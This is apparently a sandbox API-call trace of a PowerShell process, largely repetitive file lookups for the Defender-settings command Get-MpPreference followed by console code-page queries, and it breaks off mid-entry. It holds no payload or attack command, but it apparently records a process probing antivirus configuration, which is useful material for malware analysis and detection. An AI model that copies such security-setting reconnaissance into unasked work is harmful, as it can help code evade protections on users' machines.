[0078.395] GetLastError () returned 0x2 [0078.395] SetErrorMode (uMode=0x1) returned 0x1 [0078.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.395] GetLastError () returned 0x2 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.396] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSH", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.396] GetLastError () returned 0x2 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.396] GetLastError () returned 0x2 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.396] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.MSC", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.396] GetLastError () returned 0x2 [0078.396] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0078.397] GetLastError () returned 0x2 [0078.397] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.397] GetLastError () returned 0x2 [0078.397] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.397] GetLastError () returned 0x2 [0078.397] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.ps1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.397] GetLastError () returned 0x2 [0078.397] SetErrorMode (uMode=0x1) returned 0x1 [0078.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.397] GetLastError () returned 0x2 [0078.398] SetErrorMode (uMode=0x1) returned 0x1 [0078.398] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psm1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.398] GetLastError () returned 0x2 [0078.398] SetErrorMode (uMode=0x1) returned 0x1 [0078.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.398] GetLastError () returned 0x2 [0078.398] SetErrorMode (uMode=0x1) returned 0x1 [0078.398] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psd1", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.398] GetLastError () returned 0x2 [0078.398] SetErrorMode (uMode=0x1) returned 0x1 [0078.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.398] GetLastError () returned 0x2 [0078.398] SetErrorMode (uMode=0x1) returned 0x1 [0078.399] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.COM", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.399] GetLastError () returned 0x2 [0078.399] SetErrorMode (uMode=0x1) returned 0x1 [0078.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.399] GetLastError () returned 0x2 [0078.399] SetErrorMode (uMode=0x1) returned 0x1 [0078.399] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.EXE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.399] GetLastError () returned 0x2 [0078.399] SetErrorMode (uMode=0x1) returned 0x1 [0078.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.399] GetLastError () returned 0x2 [0078.399] SetErrorMode (uMode=0x1) returned 0x1 [0078.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.BAT", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.400] GetLastError () returned 0x2 [0078.400] SetErrorMode (uMode=0x1) returned 0x1 [0078.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.400] GetLastError () returned 0x2 [0078.400] SetErrorMode (uMode=0x1) returned 0x1 [0078.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.CMD", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.400] GetLastError () returned 0x2 [0078.400] SetErrorMode (uMode=0x1) returned 0x1 [0078.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.400] GetLastError () returned 0x2 [0078.400] SetErrorMode (uMode=0x1) returned 0x1 [0078.400] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.401] GetLastError () returned 0x2 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.401] GetLastError () returned 0x2 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.401] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.401] GetLastError () returned 0x2 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.401] GetLastError () returned 0x2 [0078.401] SetErrorMode (uMode=0x1) returned 0x1 [0078.401] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JS", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.402] GetLastError () returned 0x2 [0078.402] SetErrorMode (uMode=0x1) returned 0x1 [0078.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.402] GetLastError () returned 0x2 [0078.402] SetErrorMode (uMode=0x1) returned 0x1 [0078.402] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JSE", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.402] GetLastError () returned 0x2 [0078.402] SetErrorMode (uMode=0x1) returned 0x1 [0078.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.402] GetLastError () returned 0x2 [0078.402] SetErrorMode (uMode=0x1) returned 0x1 [0078.403] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSF", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.403] GetLastError () returned 0x2 [0078.403] SetErrorMode (uMode=0x1) returned 0x1 [0078.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.403] GetLastError () returned 0x2 [0078.403] SetErrorMode (uMode=0x1) returned 0x1 [0078.403] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSH", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.403] GetLastError () returned 0x2 [0078.403] SetErrorMode (uMode=0x1) returned 0x1 [0078.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.403] GetLastError () returned 0x2 [0078.403] SetErrorMode (uMode=0x1) returned 0x1 [0078.403] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.MSC", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.404] GetLastError () returned 0x2 [0078.404] SetErrorMode (uMode=0x1) returned 0x1 [0078.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0078.404] GetLastError () returned 0x2 [0078.404] SetErrorMode (uMode=0x1) returned 0x1 [0078.404] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference", lpFindFileData=0x5c8ef8 | out: lpFindFileData=0x5c8ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0078.404] GetLastError () returned 0x2 [0078.404] SetErrorMode (uMode=0x1) returned 0x1 [0078.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.408] GetLastError () returned 0xcb [0078.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.410] GetLastError () returned 0x2 [0078.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce92c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.410] GetLastError () returned 0x2 [0078.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce92c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.410] GetLastError () returned 0x2 [0078.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce92c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.410] GetLastError () returned 0x2 [0078.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5c82f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.464] GetLastError () returned 0xcb [0078.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.652] GetLastError () returned 0xcb [0078.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.652] GetLastError () returned 0xcb [0078.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dcdf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.652] GetLastError () returned 0xcb [0078.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5dce4c0 | out: lpConsoleScreenBufferInfo=0x5dce4c0) returned 1 [0078.679] GetLastError () returned 0xcb [0078.759] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5dcebd4 | out: lpConsoleScreenBufferInfo=0x5dcebd4) returned 1 [0078.759] GetLastError () returned 0xcb [0078.763] GetConsoleOutputCP () returned 0x1b5 [0078.765] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.766] GetLastError () returned 0xcb [0078.766] GetConsoleOutputCP () returned 0x1b5 [0078.766] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.766] GetLastError () returned 0xcb [0078.766] GetConsoleOutputCP () returned 0x1b5 [0078.766] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.766] GetLastError () returned 0xcb [0078.766] GetConsoleOutputCP () returned 0x1b5 [0078.766] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.766] GetLastError () returned 0xcb [0078.766] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.767] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.767] GetLastError () returned 0xcb [0078.767] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.768] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.768] GetLastError () returned 0xcb [0078.768] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.769] GetLastError () returned 0xcb [0078.769] GetConsoleOutputCP () returned 0x1b5 [0078.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: 